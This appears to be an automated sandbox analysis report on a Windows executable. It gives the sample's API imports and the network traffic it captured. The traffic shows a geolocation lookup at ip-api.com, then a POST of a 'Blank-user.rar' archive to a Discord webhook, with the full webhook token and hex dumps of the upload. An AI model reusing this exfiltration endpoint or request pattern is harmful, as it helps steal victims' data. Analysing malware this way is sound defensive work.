                                                                                                                                                                                                                                      KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                      ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                      GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.171122074 CET4981680192.168.2.5208.95.112.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.175950050 CET8049816208.95.112.1192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.176048040 CET4981680192.168.2.5208.95.112.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.176166058 CET4981680192.168.2.5208.95.112.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.180941105 CET8049816208.95.112.1192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.758825064 CET8049816208.95.112.1192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.799671888 CET4981680192.168.2.5208.95.112.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.015697002 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.015747070 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.015815973 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.034303904 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.034321070 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.492398977 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.493822098 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.493843079 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.495281935 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.495356083 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.496556044 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.496624947 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497042894 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497051954 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497114897 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497136116 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497277021 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497306108 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497428894 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497447968 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497555017 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497574091 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497592926 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497603893 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497664928 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497673988 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497695923 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497704029 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497718096 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497725964 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497745037 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497751951 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497776031 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497783899 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497793913 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497802973 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497808933 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497822046 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497843981 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497879028 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497893095 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497912884 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497937918 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497937918 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497958899 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497972012 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.497999907 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.507289886 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509293079 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509321928 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509346962 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509394884 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509429932 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.509429932 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.510206938 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.510255098 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.511823893 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512047052 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512079954 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512111902 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512139082 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512164116 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512181997 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512207985 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512221098 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.512240887 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.513060093 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.148323059 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.148387909 CET44349822162.159.137.232192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.148468971 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.149060011 CET49822443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.361680984 CET4981680192.168.2.5208.95.112.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.366792917 CET8049816208.95.112.1192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:36.369129896 CET4981680192.168.2.5208.95.112.1

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.163508892 CET5333053192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.170417070 CET53533301.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.007340908 CET6464853192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.014811039 CET53646481.1.1.1192.168.2.5

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.163508892 CET192.168.2.51.1.1.10xbb9eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.007340908 CET192.168.2.51.1.1.10x82e6Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.170417070 CET1.1.1.1192.168.2.50xbb9eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.014811039 CET1.1.1.1192.168.2.50x82e6No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.014811039 CET1.1.1.1192.168.2.50x82e6No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.014811039 CET1.1.1.1192.168.2.50x82e6No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.014811039 CET1.1.1.1192.168.2.50x82e6No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:35.014811039 CET1.1.1.1192.168.2.50x82e6No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                      • discord.com
                                                                                                                                                                                                                                      • ip-api.com

                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.549816208.95.112.1805860C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.176166058 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                      Jan 4, 2025 09:42:34.758825064 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Sat, 04 Jan 2025 08:42:33 GMT
                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 204
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.549822162.159.137.2324435860C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC302OUTPOST /api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYXnAAQrWNBsuZgspVDvCX9c HTTP/1.1
                                                                                                                                                                                                                                      Host: discord.com
                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                      Content-Length: 758909
                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=5bfc7a42494d43b6e137242c97784aaf
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 2d 2d 35 62 66 63 37 61 34 32 34 39 34 64 34 33 62 36 65 31 33 37 32 34 32 63 39 37 37 38 34 61 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 20 ff c9 60 21 04 00 00 01 0f 4b ec 9f 7d 7e 44 0d df f9 39 0f f8 ea 9e 84 7f 8c a6 9d 73 65 18 d5 9d 72 03 9e db 0a 3e 1e 43 68 e0 7e 73 3a a5 1d 78 47 6c 44 1e 72 e6 a2 a8 1c 3b b0 2e 95 b9 22 3b 5b 0d 80 e8 7b 62 fc 3b 7c af 23 62 25 70 2f db 61 51 1b c6 f2 1d 68 64 1c 10 94 e8 d0
                                                                                                                                                                                                                                      Data Ascii: --5bfc7a42494d43b6e137242c97784aafContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar! `!K}~D9ser>Ch~s:xGlDr;.";[{b;|#b%p/aQhd
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 0e bd 42 43 4b c7 6d 4c 7b e7 ae 02 3d 7b 38 eb 4e 5b 4d bc 39 15 1a db 36 da 7b 08 eb e8 c0 78 28 e1 c0 1a 45 e8 72 47 c7 81 b3 11 d1 36 2a 97 3d 07 24 0e 2c ab 7b 45 49 7f d2 5c c2 d1 40 29 19 3b 4d 29 4e 3b fc 64 4d a6 11 76 ac 7d ef 63 60 c3 60 08 b5 c1 2b 4c 3d 78 25 8a 4d 18 45 8e 4c 97 1f 22 89 c4 a9 6a ff 34 fa 45 1f 03 2e d9 c2 67 6b a0 41 83 ef 4a 82 93 58 b2 b3 52 69 f7 93 33 50 69 72 9f b3 a3 7c 68 f8 ff d7 78 0a 11 b7 af 48 4e 60 36 75 07 e5 a6 a3 f5 f1 44 48 14 75 56 33 4c b6 27 b2 f7 d7 80 d0 78 01 3d f1 36 10 46 5e 97 78 a0 bf b7 96 0c 0b c0 c4 a6 6b 3c 03 99 0f a7 e4 4c db bd 45 fa 7c 1f 7a 4d ee 80 4b 33 9f 6a a5 c3 6e 56 8e 84 12 29 b3 3d ff de 18 2a d4 a9 f9 67 e9 d2 71 9e 53 35 32 b7 5d 7f e0 7d 8b cf a4 73 4a b1 c6 0c 89 9f 88 bf 13
                                                                                                                                                                                                                                      Data Ascii: BCKmL{={8N[M96{x(ErG6*=$,{EI\@);M)N;dMv}c``+L=x%MEL"j4E.gkAJXRi3Pir|hxHN`6uDHuV3L'x=6F^xk<LE|zMK3jnV)=*gqS52]}sJ
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 50 6f 4d 76 29 c0 2f de bb e1 2a 57 b1 f3 72 e9 eb 50 81 31 6e fc 55 04 4a 5e 2e ed 04 46 01 e8 e0 6d de d0 55 3b 08 0e 4f b0 50 82 ef 30 b7 57 84 f9 41 c9 83 ef 46 0d 55 17 93 89 8b 8f 93 c0 ff 8f e5 25 38 87 27 a0 15 4a 97 f7 73 88 05 89 5c c6 09 f2 46 7b 66 7d 00 5d 65 9f f0 df 79 1f 75 d2 7d d7 9a bd d1 8f b1 21 d9 f8 62 b8 7b 20 31 4d b4 d0 46 fb 41 23 94 7d 24 25 18 34 fb 79 d6 7e b8 ab 24 85 54 89 ca 19 8b 5e 54 6c d4 ea f9 b0 80 20 9d f3 09 bc 07 59 e6 3d ba fe b9 ea 78 e6 62 3a b0 bb b5 fe f2 81 0a 4c 9e 2f a9 19 31 bf 22 54 d4 e2 43 26 35 2b 48 44 39 a9 3f 84 68 82 0b 8d f9 eb 53 e9 0f aa 3f 9c e2 21 69 2b 47 82 d0 6c 96 04 6d ff be 4d 6e d3 a9 b2 e1 41 3d 7f 96 21 e5 fc eb bc c3 47 ad 2d 8e e5 ae e6 09 31 03 6d c3 71 3a b7 ce 04 fc 58 61 8c 43
                                                                                                                                                                                                                                      Data Ascii: PoMv)/*WrP1nUJ^.FmU;OP0WAFU%8'Js\F{f}]eyu}!b{ 1MFA#}$%4y~$T^Tl Y=xb:L/1"TC&5+HD9?hS?!i+GlmMnA=!G-1mq:XaC
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 6e 79 c5 bf 01 00 63 fb f1 95 9c de 72 52 82 7a 71 91 75 98 fe c9 64 26 06 1e c3 c1 76 d9 31 13 5f aa c2 af 24 d6 da 59 cb 18 d7 98 73 97 23 e0 20 17 10 d3 45 ad a4 7b df 54 2f e8 40 e5 a9 da c5 f8 7c 58 42 33 4d ca 51 3e 62 f3 42 00 dc 5e d7 75 c6 35 9d 31 b1 57 25 71 90 0a 81 d4 54 d1 e7 85 2f 73 24 6c c3 f3 7d af 2b 96 14 10 0a 9e f8 a4 48 5b f8 ee 9c cc d9 cf 8a b1 34 8b 80 95 7a a1 d9 92 1e 6d 66 15 04 1c 7a 41 51 39 fd 94 03 dd 9a f7 64 42 08 92 c3 ef 0c 5f 06 62 e2 2c 88 1d 76 f5 3e 24 ab af c7 7e d9 d6 07 81 da b5 ed 44 1d 7c 1c f7 8f ad 97 ec 4a f6 87 41 4b 4c 62 88 00 4f 06 0d 22 1e 68 89 14 a2 38 b8 3c c1 d6 aa 54 cb 55 d9 7b e3 6d 10 5f 94 73 be c4 4a b0 13 91 6a 46 1d 75 3d d1 ef be 54 fa 7f c0 dd e6 7f 6f 4d b6 df 9c d9 f5 77 0a 9e 01 74 77
                                                                                                                                                                                                                                      Data Ascii: nycrRzqud&v1_$Ys# E{T/@|XB3MQ>bB^u51W%qT/s$l}+H[4zmfzAQ9dB_b,v>$~D|JAKLbO"h8<TU{m_sJjFu=ToMwtw
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 1d 9e dc 52 ea 02 89 84 45 72 66 54 db ad 31 3b 4d a9 fa db 7f 75 56 d3 c2 e2 47 e8 cb 00 24 51 f7 74 ea e0 08 4f 1f 81 28 31 f2 7e 6b e9 df 48 f0 d7 8a 7f 14 47 ef 1f f6 5f e1 64 ed 96 fc 4a ff 47 aa c7 96 5c de 08 b4 75 f6 cf c8 18 be 97 ea ea af 98 2e 2e 46 c9 28 8f 81 6a 9b ea 3b b7 be e4 25 2a 5b fd 34 c9 a4 ed 7b d8 eb 29 fd dc ce 4a 10 e7 13 28 12 e6 d3 d9 ff 25 b9 28 29 ab a8 69 93 c6 7c 5b 17 1b 51 5d 53 57 a7 df ee 1a 9b c1 d5 05 93 7e 35 3b ac 04 46 eb 75 f2 a1 95 60 bc e4 80 33 b4 93 69 b7 18 14 d5 3c 04 02 45 b2 09 15 54 f1 c9 bb 65 01 37 07 1f 3f ca 82 bd 13 1a 0b 6a 8e 1f ff 89 df 74 dd 96 1a ff 1b 2a 23 0f ba 09 2f 34 20 b8 49 1f 7b 8f 91 28 d5 20 54 3d 44 d1 bd e1 dd cc 7c ed 66 88 e7 3d d1 7d 3a e9 93 f5 fd d2 a1 23 18 9c 96 a3 0e b1 89
                                                                                                                                                                                                                                      Data Ascii: RErfT1;MuVG$QtO(1~kHG_dJG\u..F(j;%*[4{)J(%()i|[Q]SW~5;Fu`3i<ETe7?jt*#/4 I{( T=D|f=}:#
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: de 5e 31 da 8f b1 93 e5 df b9 1a c6 73 c5 fe 10 67 4a 2d 1e a3 a0 74 84 e1 50 15 e9 d4 5e 92 54 aa e2 d7 cc d9 ad 84 98 c7 02 7d 28 4e 91 a7 36 ea ac 4d ef e3 7d 36 f3 b6 27 b2 33 e0 f7 51 8a d4 70 a5 56 91 c4 bb bd f6 a9 d6 1c 61 72 5a fb 5e 25 72 9a 8e e6 8b d6 b4 cc 87 84 11 f1 db d5 30 21 68 18 7f 34 93 56 d1 cc c7 aa 1f 6f 61 fb 91 97 51 43 99 10 18 f0 f6 8c 15 ce dd 9f 23 50 fa ab b1 1d 33 be ea a6 c2 b3 2e c6 96 1e 85 94 ce d2 58 e0 51 62 a8 08 33 bc a3 d5 5e 83 4f 4e 71 d9 66 0b 83 9b 69 73 df 0b 8b 42 8c 85 2b 2b 8b a6 c1 29 8c 01 47 e4 1c 50 1c e7 3d 66 42 28 78 7d 8c 6d be 1f 3f 25 44 b3 96 68 f1 11 67 28 fa 22 e8 df 56 4a 1b ab 52 67 29 92 07 a1 f5 86 f0 13 a0 13 9f f6 ed 5c 92 0d 4b 76 7c 24 10 7a c3 66 8a 85 e4 bb ab 31 92 ff ea 1a 8e 4e 3e
                                                                                                                                                                                                                                      Data Ascii: ^1sgJ-tP^T}(N6M}6'3QpVarZ^%r0!h4VoaQC#P3.XQb3^ONqfisB++)GP=fB(x}m?%Dhg("VJRg)\Kv|$zf1N>
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 27 a3 9e f8 48 17 3b 85 1f 34 d0 1e a4 4f 83 3d 85 a1 9c 03 19 98 15 ba 4d e8 33 2b 57 ee a9 d1 2e 70 b6 90 e9 46 94 1d 07 1a 31 11 42 b2 c7 63 25 1e f0 40 fe 90 a5 2b 6f 17 24 f7 f8 dc e7 b9 89 ab 1e f2 f0 08 97 cf 1a 4f 59 59 01 03 f4 c9 ef 76 7a 43 0f 8e 0f 75 ca 8f 85 52 58 2c 28 30 4e de 57 47 90 b6 85 f2 d3 74 ad 57 f7 83 24 34 83 5a 5c 7d 70 4d f6 9d 80 90 96 d7 83 88 4d 3c 5e 0e 84 b3 fc b1 41 bc 48 f5 ae c5 e6 6e 87 42 b7 ea a4 25 ba 00 69 fa dc d4 fd 88 01 50 c4 d8 31 d7 9f 06 64 88 57 ce 4e c3 0b 0d 32 db e3 15 d4 12 08 95 7b 9d ea 7f a2 33 4a 24 79 55 5a c5 66 9d 32 30 d8 57 9b 0e 54 a1 ae 3e f8 70 68 51 0e a7 b8 37 65 6a 5b dd 01 cf 06 be e3 cb 26 ff 1e a5 96 22 63 77 46 21 93 b3 26 5b ad f3 53 7a e4 bd 36 ed b2 a0 59 58 c8 94 02 25 48 38 23
                                                                                                                                                                                                                                      Data Ascii: 'H;4O=M3+W.pF1Bc%@+o$OYYvzCuRX,(0NWGtW$4Z\}pMM<^AHnB%iP1dWN2{3J$yUZf20WT>phQ7ej[&"cwF!&[Sz6YX%H8#
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 41 37 07 50 27 82 a6 8a c4 97 e2 18 6a 10 fd 49 97 0a e5 ae ee 5e 96 bb 88 79 d7 5e 41 2f 16 1e c0 94 a2 dc c0 3e 39 a5 aa 08 5f e0 9a 52 01 16 eb e2 1e a1 13 03 de 73 9d 02 b4 1a 0c dd 76 cc 70 2e ce f6 e3 02 4e 02 6f 6f b8 9d 3e 37 a2 c2 81 36 a9 25 7e ac 1b e9 cc dd 5a 99 ae e5 06 78 5e 98 65 d5 09 8c f0 9e 9c 39 53 ae cc aa 49 4f 9b 3d 33 ad 4d be a5 a5 c2 c4 bc 25 07 cf f5 3a d6 96 8e b6 d0 6d 2a 47 35 b2 c5 6c e8 11 13 d2 67 52 40 8f 59 60 84 4a f4 f9 0d c6 1e 68 c7 68 5d 24 c2 85 fd 8b 2e f3 61 2a f1 48 1a e6 66 0d 58 be 67 d4 76 35 1f 4e 86 6a cf 49 21 55 6a e0 84 08 a8 78 8a 58 cc 2a 1a cd 8f e4 b4 81 9a 08 76 d5 08 e5 d0 8f e7 45 ba b0 c0 85 18 8e 05 26 96 e4 35 be de 8c 34 1a 47 ab 82 02 30 6f 9b 82 92 da 4a b5 e3 ce cf 98 c3 1d 63 57 6c ce d3
                                                                                                                                                                                                                                      Data Ascii: A7P'jI^y^A/>9_Rsvp.Noo>76%~Zx^e9SIO=3M%:m*G5lgR@Y`Jhh]$.a*HfXgv5NjI!UjxX*vE&54G0oJcWl
